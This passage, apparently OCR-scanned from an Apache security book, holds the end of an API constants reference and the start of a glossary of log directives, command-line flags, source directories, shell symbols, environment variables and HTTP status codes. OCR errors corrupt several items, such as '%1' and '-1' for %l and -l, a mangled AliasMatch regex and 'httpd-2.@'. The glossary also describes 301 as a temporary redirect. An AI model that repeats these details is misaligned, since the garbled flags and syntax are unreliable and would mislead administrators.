

LF 
MAX_STRING_LEN 


MODULE_MAGIC_COOKIE 
MODULE_MAGIC_NUMBER 


MODULE_MAGIC_NUMBER_MAJOR 


MODULE_MAGIC_NUMBER_MINOR 


MULTI_ERR 
MULTI_OK 

MULTI_ TIMEOUT 
M_CONNECT 

M_COPY 

M_DELETE 

M_GET 

M_INVALID 

M_LOCK 

M_MKCOL 

M_MOVE 

M_OPTIONS 

M_PATCH 

M_POST 

M_PROPFIND 

M_PUT 

M_TRACE 

M_UNLOCK 
NOT_IN_DIRECTORY 
NOT_IN_DIR_LOC_FILE 
NOT_IN_FILES 
NOT_IN_LIMIT 
NOT_IN_LOCATION 
NOT_IN_VIRTUALHOST 
NO_ARGS 


Enumeration of how Apache kills processes. Choices are 
kill_never, kill_always, kill_after_timeout, 
just_wait, and kill_only_once, or never, with a 
SIGKILL on pool cleanup, SIGKILL after three seconds, 
wait forever, or send a SIGTERM and wait, respectively. 
Defines a name for the line-feed character's value. 
Defines the largest static string buffer Apache supports 
(same as HUGE_STRING_LEN). 

Used to test module structure validity. 

Used to test if module version number matches 
MODULE_MAGIC_NUMBER. Old. 

Used to test if module version number matches 
MODULE_MAGIC_NUMBER (Major, Minor, AtLeast). 

Used to test if module version number matches 
MODULE_MAGIC_NUMBER (Major, Minor, AtLeast). 
Thread error return value. 

Thread success return value. 

Thread timeout return value control. 

Used in disallowing HTTP method CONNECT. 

Used in disallowing HTTP method Copy. 

Used in disallowing HTTP method DELETE. 

Used in disallowing HTTP method GET. 

Used in disallowing HTTP method INVALID. 

Used in disallowing HTTP method LOCK. 

Used in disallowing HTTP method MKCOL. 

Used in disallowing HTTP method MOVE. 

Used in disallowing HTTP method OPTIONS. 

Used in disallowing HTTP method PATCH. 

Used in disallowing HTTP method POST. 

Used in disallowing HTTP method PROPFIND. 

Used in disallowing HTTP method PUT. 

Used in disallowing HTTP method TRACE. 

Used in disallowing HTTP method UNLOCK. 

Not in directory structure. 

Not in directory location structure. 

Not in files structure. 

Not in limit structure. 

Not in location structure. 

Not listed in virtual host structure. 

Command takes no arguments. 
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Constant Description 
OK Everything is OK. No error. 
OPT_ALL Options ALL. 


OPT_EXECCGI 
OPT_INCLUDES 
OPT_INCNOEXEC 
OPT_INDEXES 
OPT_MULTI 
OPT_NONE 
OPT_SYM_LINKS 
OPT_SYM_OWNER 
OPT_UNSET 
OR_AUTHCFG 
OR_FILEINFO 


OR_INDEXES 
OR_LIMIT 


OR_OPTIONS 
proxyreqtype 
RAW_ARGS 
REQUEST_NO_BODY 
RSRC_CONF 


SECURITY_HOLE_PASS AUTHORIZATION 
SERVER_BUSY_DNS 
SERVER_BUSY_KEEPALIVE 
SERVER_BUSY_LOG 
SERVER_BUSY_READ 
SERVER_BUSY_WRITE 
SERVER_DEAD 
SERVER_GRACEFUL 
SERVER_NUM_STATUS 
SERVER_READY 
SERVER_STARTING 
SERVER_SUPPORT 
SERVER_VERSION 
START_PREQUEST 
STOP_PREQUEST 


Options Exec CGI (execute CGI). 

Options Includes (SSI). 

Options Includes with no executable power. 

Options Indexes. 

Options MultiViews. 

Options (none). 

Options FollowSymLinks. 

Option SymLinksIfOwnerMatch. 

Unset options. 

Allow override auth config. 

A directive with the OR_FILEINFO bit set might appear 
anywhere in the global or server-wide configuration files. 
Allow override indexes. 

Override limit. A directive with the OR_LIMIT bit set 
might appear anywhere in the global or server-wide 
configuration files. 

Override options. 

The type of proxy request (proxy modules). 

Raw arguments (cmd_func). 

Request has empty body. 

Any directive with this bit set can appear in global or 
server-wide config files. 

Passes not just username but password in authentication. 
Indicates Apache is doing a DNS lookup. 

Indicates Apache is handling a keep-alive. 

Indicates Apache is writing a log. 

Indicates Apache is reading from a client. 

Indicates Apache is writing to a client. 

Indicates Apache is down. 

Indicates Apache is performing graceful restart. 
Indicates the number of current state variables. 
Indicates Apache is ready and listening. 

Indicates Apache is spawning. 

Location at which to seek support for Apache. 

String containing Apache’s server version. 

Indicate a request’s processing has started. 

Indicate a request’s processing has stopped. 
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Constant Description 

TAKE1 Take 1 argument (argument processing, RAW_ARGS). 

TAKE12 Take 1 or 2 arguments (argument processing, RAW_ARGS). 

TAKE123 Take 1, 2, or 3 arguments (argument processing, 
RAW_ARGS). 

TAKE13 Take 1 or 3 arguments (argument processing, RAW_ARGS). 

TAKE2 Take 2 arguments (argument processing, RAW_ARGS). 

TAKE23 Take 2 or 3 arguments (argument processing, RAW_ARGS). 

TAKE3 Take 3 arguments (argument processing, RAW_ARGS). 

TARGET Determines the name of the main Apache executable file, 





and locates the shared core library. 





Summary 
This quick reference was precisely that, and not intended for folks actively develop- 
ing Apache modules. For specific information on Apache module development, 
please see Chapter 18, “Hacking Homegrown Apache Modules.” 


E 
Glossary 


This glossary defines terms common to Apache usage or 
Web hosting in general. 


%e The %e Apache LogFormat directive will define the 
specified environment variable. See Chapter 9, “Spotting 
Crackers: Apache Logging Facilities.” 


%b The %b Apache LogFormat directive records the total 
number of bytes sent (not including headers) in common 
log format. See Chapter 9, “Spotting Crackers: Apache 
Logging Facilities.” 


%f The %f Apache LogFormat directive records the file- 
name requested. See Chapter 9, “Spotting Crackers: Apache 
Logging Facilities.” 


%h The %h Apache LogFormat directive records the remote 
host’s address. See Chapter 9, “Spotting Crackers: Apache 
Logging Facilities.” 


%1 The %1 Apache LogFormat directive records the 
logname (username) of the client’s user (if they’re running 
ident). See Chapter 9, “Spotting Crackers: Apache Logging 
Facilities.” 


%P The %P Apache LogFormat directive records the process 
ID of the process that satisfied the client’s request. See 
Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


%p The %p Apache LogFormat directive records the port 
that the server directed the response to. See Chapter 9, 
“Spotting Crackers: Apache Logging Facilities.” 


%r The %r Apache LogFormat directive records the first 
line of the client’s request. See Chapter 9, “Spotting 
Crackers: Apache Logging Facilities.” 
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%s The %s Apache LogFormat directive records the status of the client’s request. See 
Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


%t The %t Apache LogFormat directive records the time of the request in common 
log format by default. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


%T The %T Apache LogFormat directive records the time taken, in seconds, to satisfy 
the client’s request. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


%u The %u Apache LogFormat directive records the remote user (using auth). See 
Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


%U The %U Apache LogFormat directive records the URL that the client initially 
requested. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


%v The %v Apache LogFormat directive records the canonical name of the server 
that filled the request. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


-d serverroot Apache command-line option that lets you specify at runtime the 
value of ServerRoot. See Chapter 8, “Overlording Apache Server: General 
Administration.” 


-f config Apache command-line option that forces Apache to execute the 
commands contained in config. See Chapter 8, “Overlording Apache Server: General 
Administration.” 


-C directive Apache command-line option that forces Apache to process the 
specified directive (after it finishes reading the configuration files). See Chapter 8, 
“Overlording Apache Server: General Administration.” 


-D parameter Apache command-line option to specify conditional command 
processing. See Chapter 8, “Overlording Apache Server: General Administration.” 


-h Apache command-line option that calls an abbreviated help message. See 
Chapter 8, “Overlording Apache Server: General Administration.” 


-1 Apache command-line option that calls the list of modules compiled into 
Apache server. See Chapter 8, “Overlording Apache Server: General Administration.” 


-L Apache command-line option that prints directives and arguments. See Chapter 
8, “Overlording Apache Server: General Administration.” 


-S An Apache command-line option that shows the config file settings for virtual 
hosts. (This flag faded from version 2.0, and is therefore applicable to earlier versions 
only.) See Chapter 8, “Overlording Apache Server: General Administration.” 


-t An Apache command-line option that runs syntax tests on configuration files. 
See Chapter 8, “Overlording Apache Server: General Administration.” 
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-T An Apache command-line option that runs syntax tests on configuration files, 
except those in the default document roots. (This flag faded from version 2.0, and is 
therefore applicable to earlier versions only.) See Chapter 8, “Overlording Apache 
Server: General Administration.” 


-X An Apache command-line option that runs the server in single-process mode for 
debugging. It prevents forking. See Chapter 8, “Overlording Apache Server: General 
Administration.” 


-v An Apache command-line option that prints what Apache version you're using. 
See Chapter 8, “Overlording Apache Server: General Administration.” 


-v An Apache command-line option that prints Apache’s version and current para- 
meters. See Chapter 8, “Overlording Apache Server: General Administration.” 


httpd-2.@/modules/ In the Apache CVS source tree, the directory that stores 
module files and source code. See Chapter 14, “Apache Under the Hood: Open 
Source and Security.” 


httpd-2.@/modules/aaa/ In the Apache CVS source tree, the directory that stores 
mod_access.c, mod_auth.c, mod_auth_anon.c, mod_auth_db.c, mod_auth_dbm.c, and 
mod_auth_digest.c. See Chapter 14, “Apache Under the Hood: Open Source and 
Security.” 


httpd-2.@/modules/arch/ Inthe Apache CVS source tree, the directory that stores 
mod_isapi.c, mod_win32.c, and mod_nw_ssl.c (NetWare + SSL). See Chapter 14, 
“Apache Under the Hood: Open Source and Security.” 


httpd-2.@/modules/cache/ In the Apache CVS source tree, the directory that stores 
mod_file_cache.c. See Chapter 14, “Apache Under the Hood: Open Source and 
Security.” 


httpd-2.@/modules/dav/ In the Apache CVS source tree, the directory that stores 
liveprop.c, mod_dav.c, props.c, providers.c, std_liveprop.c, util.c, 
util_lock.c, dbm.c, lock.c, mod_dav_fs.c, and repos.c. See Chapter 14, “Apache 
Under the Hood: Open Source and Security.” 


httpd-2.@/modules/echo/ In the Apache CVS source tree, the directory that stores 
mod_echo.c. See Chapter 14, “Apache Under the Hood: Open Source and Security.” 


httpd-2.0/modules/experimental/ In the Apache CVS source tree, the directory 
that stores cache_storage.c, cache_util.c, mod_cache.c, mod_case filter.c, 
mod_case_filter_in.c, mod_charset_lite.c, mod_disk_cache.c, mod_example.c, 
mod_ext_filter.c, and mod_mem_cache.c. See Chapter 14, “Apache Under the Hood: 
Open Source and Security.” 
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httpd-2.@/modules/filters/ In the Apache CVS source tree, the directory that 
stores mod_include.c. See Chapter 14, “Apache Under the Hood: Open Source and 
Security.” 


httpd-2.@/modules/generators/ In the Apache CVS source tree, the directory that 
stores mod_asis.c, mod_autoindex.c, mod_cgi.c, mod_cgid.c, mod_info.c, 
mod_status.c, and mod_suexec.c. See Chapter 14, “Apache Under the Hood: Open 
Source and Security.” 


httpd-2.@/modules/http/ In the Apache CVS source tree, the directory that stores 
http_core.c, http_protocol.c, http_request.c, and mod_mime.c. See Chapter 14, 
“Apache Under the Hood: Open Source and Security.” 


httpd-2.@/modules/loggers/ In the Apache CVS source tree, the directory that 
stores mod_log_config.c. See Chapter 14, “Apache Under the Hood: Open Source 
and Security.” 


httpd-2.@/modules/mappers/ In the Apache CVS source tree, the directory that 
stores mod_actions.c, mod_alias.c, mod_dir.c, mod_imap.c, mod_negotiation.c, 
mod_rewrite.c, mod_so.c, mod_speling.c, mod_userdir.c, and mod_vhost_alias.c. 
See Chapter 14, “Apache Under the Hood: Open Source and Security.” 


httpd-2.@/modules/metadata/ In the Apache CVS source tree, the directory that 
stores mod_cern_meta.c, mod_env.c, mod_expires.c, mod_headers.c, 
mod_mime_magic.c, mod_setenvif .c, mod_unique_id.c, and mod_usertrack.c. See 
Chapter 14, “Apache Under the Hood: Open Source and Security.” 


httpd-2.@/modules/proxy/ In the Apache CVS source tree, the directory that stores 
mod_proxy.c, proxy_connect.c, proxy_ftp.c, proxy_http.c, and proxy_util.c. See 
Chapter 14, “Apache Under the Hood: Open Source and Security.” 


httpd-2.@/modules/ssl/ In the Apache CVS source tree, the directory that stores 
mod_ssl.c, ssl_engine_config.c, ssl_engine_dh.c, ssl_engine_ds.c, 
ssl_engine_ext.c, ssl_engine_init.c, ssl_engine_io.c, ssl_engine_kernel.c, 
ssl_engine_log.c, ssl_engine_mutex.c, ssl_engine_pphrase.c, 
ssl_engine_rand.c, ssl_engine_vars.c, ssl_expr.c, ssl_expr_eval.c, 
ssl_expr_parse.c, ssl_expr_scan.c, ssl_scache.c, ssl_scache_dbm.c, 
ssl_scache_shmcb.c, ssl_scache_shmht.c, ssl_util.c, ssl_util_ssl.c, and 
ssl_util_table.c. See Chapter 14, “Apache Under the Hood: Open Source and 
Security.” 


httpd-2.@/modules/test/ In the Apache CVS source tree, the directory that stores 
mod_optional_fn_export.c, mod_optional_fn_import.c, 
mod_optional_hook_export.c, and mod_optional_hook_import.c. See Chapter 14, 
“Apache Under the Hood: Open Source and Security.” 
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/usr/local/apache/conf/access.conf The default location on many Apache 
installations of Apache’s access configuration file. See Chapter 14, “Apache Under the 
Hood: Open Source and Security.” 


/usr/local/apache/conf/httpd.conf The default location on many Apache instal- 
lations of Apache’s main configuration file. See Chapter 14, “Apache Under the 
Hood: Open Source and Security.” 


/usr/local/apache/conf/mime.types The default location on many Apache instal- 
lations of Apache’s MIME configuration file. See Chapter 14, “Apache Under the 
Hood: Open Source and Security.” 


/usr/local/apache/conf/srm.conf The default location on many Apache installa- 
tions of Apache’s server configuration file. See Chapter 14, “Apache Under the Hood: 
Open Source and Security.” 


/usr/local/apache/logs/access_log The default location on many Apache instal- 
lations of Apache’s access log. See Chapter 14, “Apache Under the Hood: Open 
Source and Security.” 


/usr/local/apache/logs/error_log The default location on many Apache installa- 
tions of Apache’s error log. See Chapter 14, “Apache Under the Hood: Open Source 
and Security.” 


/usr/local/apache/logs/httpd.pid The default location on many Apache installa- 
tions of Apache’s process identifier. See Chapter 14, “Apache Under the Hood: Open 
Source and Security.” 


$ Use $ in Apache environment variable assignment. Syntax varies from language 
to language. In Perl, to call the value of REMOTE_HOST, pull it from @ENV: 

$ENV{ 'REMOTE_HOST'}. In PHP, it’s simpler: $REMOTE_HOST. See the respective environ- 
ment variable listings in this glossary, including AUTH_TYPE, CONTENT_LENGTH, 
CONTENT_TYPE, GATEWAY_INTERFACE, PATH_INFO, PATH_TRANSLATED, QUERY_STRING, 
REMOTE_ADDR, REMOTE_HOST, REMOTE_IDENT, REMOTE_USER, REQUEST_METHOD, 
SCRIPT_NAME, SERVER_NAME, SERVER_PORT, SERVER_PROTOCOL, and SERVER_SOFTWARE. 


* * matches any series of characters established by the preceding metacharacter’s 
rule. Example: If you precede * by ., this instructs Apache to match any series of 
characters afterward, indefinitely. In Apache configuration files, use the asterisk to 
include or specify directories or files in a wholesale manner. For example, to map 
files from http://www. yourhost.com/ to user directories in /home, use the asterisk in 
an AliasMatch directive, like this: AliasMatch */([*/]*)/?(.*) 
/home/$1/public_htm1/$2. Note that not all directives use the asterisk; some simply 
accept white space. 
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? Use ? to match any single character, especially when specifying files or directo- 
ries. Apache treats ? in a traditional regular expression context; for example, ? will 
match either zero or one instance of any character. 


; Use ; to separate shell commands you want to execute sequentially 
(command1;command2). ; is also used in some programming languages (Perl, C, C++) 
to end a statement. For example: printf("This statement ends with a semi- 
colon\n)"; 


# Use the # metacharacter: a) to comment lines in Apache configuration files. 
Apache and Unix both ignore any line following the # character—except where text 
wraps to the next line—in which case, another # is generally required; b) in conjunc- 
tion with the bang (!) symbol to announce the command interpreter that will run 
the specified script (#!/bin/sh, #!/usr/bin/perl1); or c) to specify include directives 
in C programming language source files (#include <stdio.h>). 


! The ! metacharacter (called the “bang” symbol) in csh recalls recent commands 
by history numbers. For example, the command !143 recalls the 143rd command 
since login. 


| Use | to pipe commands or force one command’s output to become the input of 
another. For example, suppose you want to look at logs of the last 10 root logins. Try 
this: last root | head -10. This will grab all recorded logins for root (last root). 
The resulting output then becomes input for head, which extracts from last’s output 
the most recent 10 logins (head -10). 


|] || represents a logical OR between two or more commands. The statement 
command? || command2 tells the shell that if command? fails, execute commana2. 


& & tells the shell to run the preceding command in the background. Use this when 
the command you want to execute could lock up the shell and therefore hang other 
processes. Example: example-command &. 


&& && represents a logical AND between two or more commands. The statement 
command? && command2 tells the shell that if command1 succeeds, execute command2. 


>& Issuing the >& file combination redirects STDOUT and STDERR to a file (and 
overwrites that file). See standard output and standard error. 


>>& Issuing the >>& combination redirects and appends STDOUT and STDERR to a file. 
See standard output and standard error. 


@ @is generally used in array assignment (@fruits=('apples', ‘oranges’, 
‘peaches')). Otherwise, @ appears in e-mail addresses (anon@mcp.com). 


< Use < to redirect input to a file or process. In various languages, < is also a 
comparative operator, the “lesser-than” symbol. 
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> Use > to redirect output to a file or process. The command dir > dir- 
listing.txt will redirect your directory-listing request (dir) to a file (dir- 
listing.txt). Also, in various programming languages, > is a comparative operator, 
the “greater-than” symbol. 


>> Use >> to redirect and append data to a file. This differs from >. >> appends infor- 
mation, adding text to the end without overwriting it. 


= = is an assignment operator first, and developers rarely use it as a comparative 
operator. In Perl, you could use = to store output from the Linux date program in a 
variable: $mydate=" /usr/bin/date’, and then have Apache print it on a document 
return. 


== == indicates equality between the two values on either side, and is for condi- 
tional tests: if ($var==4) { print "$var equals 4\n"; } 


!=  != is a comparative operator and represents a NOT EQUAL state: 1 != 2 is true, 
but 1 != 1 is false. 


$SHTTP_ACCEPT A Web environment variable that stores the comma separated list of 
mime types that are accepted by the remote browser. See Chapter 12, “Hacking 
Secure Code: Apache at Server Side.” 


$HTTP_COOKIE A Web environment variable that stores the cookie sent by the 
remote client. See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


$SHTTP_USER_AGENT A Web environment variable that stores the name of the remote 
client browser software. See Chapter 12, “Hacking Secure Code: Apache at Server 
Side.” 


$HOME $HOME, a shell environment variable, points to your home directory in Unix 
(typically, /home/hacker, where hacker is your username). To see your home direc- 
tory, type echo $HOME at a prompt. See environment variable. 


$LAST_MODIFIED A Web environment variable that stores the date and time of the 
last modification of the current document. See Chapter 12, “Hacking Secure Code: 
Apache at Server Side.” 


$LOGNAME $LOGNAME, a shell environment variable, stores your username. To see 
your current username/logname in Unix, type echo $LOGNAME at a shell prompt. See 
environment variable. 


$MAIL $MAIL, a shell environment variable, stores your mail directory’s location in 
Unix (typically /var/mail/hacker, where your username is hacker). To see your 
current mail directory, type echo $MAIL at a shell prompt. See environment vari- 
able. 
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$PATH $PATH, a Shell environment variable, stores your path in Unix and Windows 
(or, the list of directories the shell will examine when searching for files). A typical 
path might look like this: 
/bin:/usr/bin:/usr/local/bin: /usr/man: /usr/X11R6/bin. Colons separate directo- 
ries. To see your current path, type echo $PATH at a shell prompt. See environment 
variable. 


$PATH_INFO A Web environment variable that stores the extra path info that is 
sent. This information is regarded as virtual (the path is relative to the base directory 
of the HTTP server). See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


$PATH_TRANSLATED A Web environment variable that stores the PATH_INFO variable 
translated from virtual to local (physical) disk location. See Chapter 12, “Hacking 
Secure Code: Apache at Server Side.” 


$QUERY_STRING A Web environment variable that stores the raw query string sent 
from the remote browser. See Chapter 12, “Hacking Secure Code: Apache at Server 
Side.” 


$QUERY_STRING_UNESCAPED A Web environment variable that stores the unescaped 
query string sent by the client browser, all shell-special characters escaped with \. See 
Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


$REMOTE_ADDR A Web environment variable that stores the IP address of the remote 
client browser. See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


$REMOTE_HOST A Web environment variable that stores the host name of the remote 
client. See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


$REMOTE_IDENT A Web environment variable that stores the remote user name if 
supporting RFC931 identification. See Chapter 12, “Hacking Secure Code: Apache at 
Server Side.” 


$REQUEST_METHOD A Web environment variable that stores the method by which 
the current document was requested. See Chapter 12, “Hacking Secure Code: Apache 
at Server Side.” 


$SHELL A shell environment variable that stores your default shell. To see your 
default shell, type echo $SHELL at a shell prompt. See environment variable. 


$SCRIPT_NAME A Web environment variable that stores the virtual path of the script 
being executed. See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


$SERVER_NAME A Web environment variable that stores the local computer name of 
the HTTP server. See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


$SERVER_PORT A Web environment variable that stores the IP port the HTTP server 
is answering on. See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 
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$SERVER_PROTOCOL A Web environment variable that stores the name/version of 
HTTP served on this HTTP server. See Chapter 12, “Hacking Secure Code: Apache at 
Server Side.” 


$SERVER_SOFTWARE A Web environment variable that stores the name of the HTTP 
server software. See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


$REMOTE_USER A Web environment variable that stores the user name used to vali- 
date authentication from the remote client. Great for use in password-protected sites. 
See Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


$TERM A shell environment variable that stores your current terminal emulation. To 
see your current terminal emulation, type echo $TERM at a shell prompt. See envi- 
ronment variable. 


$TZ A shell environment variable that stores your default timezone. To see your 
current timezone, type echo $TZ at a shell prompt. See environment variable. 


200 (status code) The 200 code indicates that Apache sent the request file 
without error on the server side. See Chapter 9, “Spotting Crackers: Apache Logging 
Facilities.” 


201 (status code) The 201 code indicates that a command was issued, and 
Apache satisfied it successfully by creating a new resource without event. See Chapter 
9, “Spotting Crackers: Apache Logging Facilities.” 


202 (status code) The 202 code indicates that the client’s command was accepted 
by the server for processing. See Chapter 9, “Spotting Crackers: Apache Logging 
Facilities.” 


203 (status code) The 203 code indicates that the answer was non-authoritative. 
See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


204 (status code) The 204 code indicates that the client’s request was processed, 
but the server couldn’t return any data. See Chapter 9, “Spotting Crackers: Apache 
Logging Facilities.” 


300 (status code) The 300 code indicates that the requested resource corresponds 
to any one of a set of representations, each with its own specific location, and agent- 
driven negotiation information is being provided so that the user (or user agent) can 
select a preferred representation and redirect its request to that location (multiple 
choices).See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


301 (status code) The 301 code indicates that the server found the client’s 
requested data at an alternate, temporarily redirected URL. See Chapter 9, “Spotting 
Crackers: Apache Logging Facilities.” 
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302 (status code) The 302 code indicates that the server suggested an alternate 
location for the client’s requested data. See Chapter 9, “Spotting Crackers: Apache 
Logging Facilities.” 

303 (status code) The 303 code indicates that the server had to forward the 
request to another location for an answer (such as directing the user agent to a 
cacheable resource). See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


304 (status code) The 304 code indicates that the client performed a conditional 
GET request and access is allowed, but the document has not been modified. 


305 (status code) The 305 code indicates that the client must access the 
requested resource through the proxy given by the Location field. The Location field 
gives the URI of the proxy. The recipient is expected to repeat this single request via 
the proxy. 


307 (status code) The 307 code indicates that Apache had to forward the request 
to another location. 


400 (status code) The 400 code indicates that the client made a malformed 
request which could therefore not be processed. See Chapter 9, “Spotting Crackers: 
Apache Logging Facilities.” 

401 (status code) The 401 code indicates that the client tried to access data that 
it is not authorized to have. See Chapter 9, “Spotting Crackers: Apache Logging 
Facilities.” 


402 (status code) The 402 code indicates that a payment scheme has been nego- 
tiated. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


403 (status code) The 403 code indicates that access is forbidden altogether. See 
Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


404 (status code) The 404 code (the most often-seen code) indicates that the 
document was not found. See Chapter 9, “Spotting Crackers: Apache Logging 
Facilities.” 


405 (status code) The 405 code indicates that the client’s request method is not 
allowed. 


406 (status code) The 406 code indicates that the client’s request is 
unacceptable. 


407 (status code) The 407 code indicates that proxy authentication is required. 
408 (status code) The 408 code indicates that the request timed out. 


409 (status code) The 409 code indicates that Apache, while attempting to 
satisfy the client request, encountered a conflict. 
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410 (status code) The 410 code indicates that the requested resource is gone. 


411 (status code) The 411 code indicates that a request length is required and 
Apache did not receive it as expected. 


412 (status code) The 412 code indicates that some precondition Apache 
expected failed. 


413 (status code) The 413 code indicates that the client’s request entity was too 
long to process. 


414 (status code) The 414 code indicates that the client’s request URI was too 
long. 


415 (status code) The 415 code indicates that the client sent a request that 
contained (or asked for) an unsupported media type. 


500 (status code) The 500 code indicates that an internal server error occurred 
from which the server could not recover. This is a common error when a client calls 
a flawed CGI script. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


501 (status code) The 501 code indicates that the client requested an action that 
the server cannot perform or does not support. See Chapter 9, “Spotting Crackers: 
Apache Logging Facilities.” 


502 (status code) The 502 code indicates that the server received a bad response 
from an upstream or support server (a bad gateway). See Chapter 9, “Spotting 
Crackers: Apache Logging Facilities.” 


503 (status code) The 503 code indicates that the Apache service is unavailable 
(the Web server is busy and cannot process requests right now). 


504 (status code) The 504 code indicates that a gateway Apache was waiting for 
timed out. 


505 (status code) The 505 code indicates that the client’s requested HTTP version 
is unsupported. 


.aif This file extension denotes an Apple or SGI (IRIX) sound file. 


.avi This file extension denotes a Video for Windows file (containing either real 
video or animation). 


.awk This file extension denotes an awk program (Example: count .awk). See awk. 
-bck This file extension denotes a backup file. 


.c This file extension denotes a C programming language source file (Example: 
menu.c). See C. 
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-cc This file extension (rarely used in Linux) denotes a C++ programming language 
source file (Example: menu.cc). See C++. 


.csh_ This file extension denotes a C shell program file (Example: cut.csh). See C 
shell. 


.cgi This file extension denotes a CGI program source file (Example: 
Webcounter.cgi). Such files probably contain Perl programs, which are also some- 
times named with a .p1 extension. See Perl. 


-CGM This file extension denotes a Computer Graphics Metafile (image) file. 
-conf This file extension denotes a configuration file (Example: access.conf). 
-cpp This file extension denotes C code (for preprocessing). 


.dat This file extension denotes a data file that could originate from almost any 
platform. 


-db This file extension denotes a database file (Example: users. db). 


-doc This file extension denotes either a plain text file or a Microsoft Word docu- 
ment. 


.gz This file extension denotes a compressed file (Example: package. gz). 
.h This file extension denotes a C programming language header file. 


-htaccess The htpasswd access file. See htpasswd and Chapter 11, “Apache and 
Authentication: Who Goes There?” 


-htpasswd The htpasswd password database (for password-protecting Web sites). 
See htpasswd and Chapter 11, “Apache and Authentication: Who Goes There?” 


.o This file extension denotes a C programming language-compiled object file. 
-pl This file extension denotes a Perl script file. See Perl. 

-ps This file extension denotes a postscript file. See PostScript. 

-py This file extension denotes a Python program file. See Python. 

-S This file extension denotes an assembler language file. 

.sh This file extension denotes a shell program file. 


-shtml File extension that denotes that the specified file has within it server-side 
include (SSI) directives. See Chapter 12, “Hacking Secure Code: Apache at Server 
Side.” 


.tar This file extension denotes a tar archive file. See tar. 


.tcl This file extension denotes a Tcl program. See Tcl. 
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.tgz This file extension denotes a compressed file (Example: package. tgz). 
.uue This file extension denotes uuencoded text. See uuencode. 

.uud This file extension denotes uudecoded text. See uuencode. 

-XBM_ This file extension denotes an X Window System bitmap (image). 

.Z This file extension denotes a compressed file (Example: package. tgz). 


3DES  3DES is another way of referring to TripleDES, where DES runs through three 
levels of encryption. See DES. 


AAA Authentication, Authorization, and Accounting. See Chapter 9, “Spotting 
Crackers: Apache Logging Facilities.” 


AAA server A server designated specifically to handle authentication, authoriza- 
tion, and accounting. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


absolute path The absolute path is the specified resource’s full path, beginning at 
root. In reference to URLs in scripts, an absolute path is the whole shebang, either on 
the inside (/var/http/myhost.com/index.htm1) or the outside 

(http: //www.myhost.com/index.html), as opposed to /index.html. 


access control Means to selectively grant or deny users access to system resources. 


access control list (ACL) A list wherein you specify what system resources 
you're allowing users to access (and which users can obtain such access). Sometimes 
called simply an access list. Access lists can be complicated (listing where, when, 
and how users can access resources) or rudimentary (a list of users and their corre- 
sponding passwords). 


access time Access time is the time during which a user can access a particular 
object or resource. For example, an administrator might restrict a user’s login capabil- 
ity to weekdays between the hours of 8:00 a.m. and 5:00 p.m. This is the user’s access 
time. 


account policies In many operating systems, you can establish user logon and 
password policies. For example, how long is a user’s password valid? Should she be 
allowed to change it? These policies are account policies. 


accreditation A statement from some authority that your Web site and business 
practices are secure or lend to security. 


add-on security controls Security controls not included in a default installation, 
added after-the-fact, usually to legacy hardware or software. 


address A hostname or URL on the World Wide Web. 
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address space Total memory allocated for any given resource (a server, hosts, or 
IP addresses). 


alias Aliases are short nicknames for either commands or directories. 


applet A small Java program that runs in Web browser environments that contain 
a locally installed Java Virtual Machine. Applets add graphics, animation, and 
dynamic text to otherwise boring Web pages. Applets can have serious security 
implications, however. In sensitive environments, disable browser applet capability 
and/or screen content through your firewall or packet filters. 


APLOG_ALERT Web server constant in http_log.h (for logging alerts). See Appendix 
D, “Apache API Quick Reference.” 


APLOG_CRIT Web server constant in http_log.h (for logging critical events). See 
Appendix D, “Apache API Quick Reference.” 


APLOG_DEBUG Web server constant in http_log.h (for debug logging). See Appendix 
D, “Apache API Quick Reference.” 


APLOG_EMERG Web server constant in http_log.h (for emergency logging). See 
Appendix D, “Apache API Quick Reference.” 


APLOG_ERR Web server constant in http_log.h (for error logging). See Appendix D, 
“Apache API Quick Reference.” 


APLOG_INFO Web server constant in http_log.h (for informational logging). See 
Appendix D, “Apache API Quick Reference.” 


APLOG_LEVELMASK Web server constant in http_log.h (for logging by level). See 
Appendix D, “Apache API Quick Reference.” 


APLOG_MARK Web server constant in http_log.h (for error logging). See Appendix D, 
“Apache API Quick Reference.” 


APLOG_NOERRNO Web server constant in http_log.h (for error logging). See 
Appendix D, “Apache API Quick Reference.” 


APLOG_NOTICE Web server constant in http_log.h (for logging notices). See 
Appendix D, “Apache API Quick Reference.” 


APLOG_WARNING Web server constant in http_log.h (for logging warnings). See 
Appendix D, “Apache API Quick Reference.” 


APLOG_WIN32ERROR Web server constant in http_log.h (for logging service control 
dispatcher errors). See Appendix D, “Apache API Quick Reference.” 


array A list that stores values that are part of a subset. For example, you could 
create an array called @fruits. Inside of @fruits, you could store apples, oranges, 
pears, and so on. 
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asymmetric cipher Cipher that employs a public-key/private-key cryptosystem. 
In such systems, A encrypts a message to B’s public key. From that point on, the 
message can only be decrypted using B’s private key. 


attack An intruder’s attempt to access or disable your Web server. 


attribute The state of a given file or directory and whether it’s readable, hidden, 
system, or other. Also sometimes refers to the state of objects in JavaScript and 
HTML. 


audit Loosely defined, a systematic analysis of your system or business practices. 
Its purpose in this context is to ascertain if you maintain the best practices. Less 
loosely defined, a proactive test of your security controls and your server’s ability to 
survive, record, track, analyze, and report attacks. See Chapter 9, “Spotting Crackers: 
Apache Logging Facilities.” 


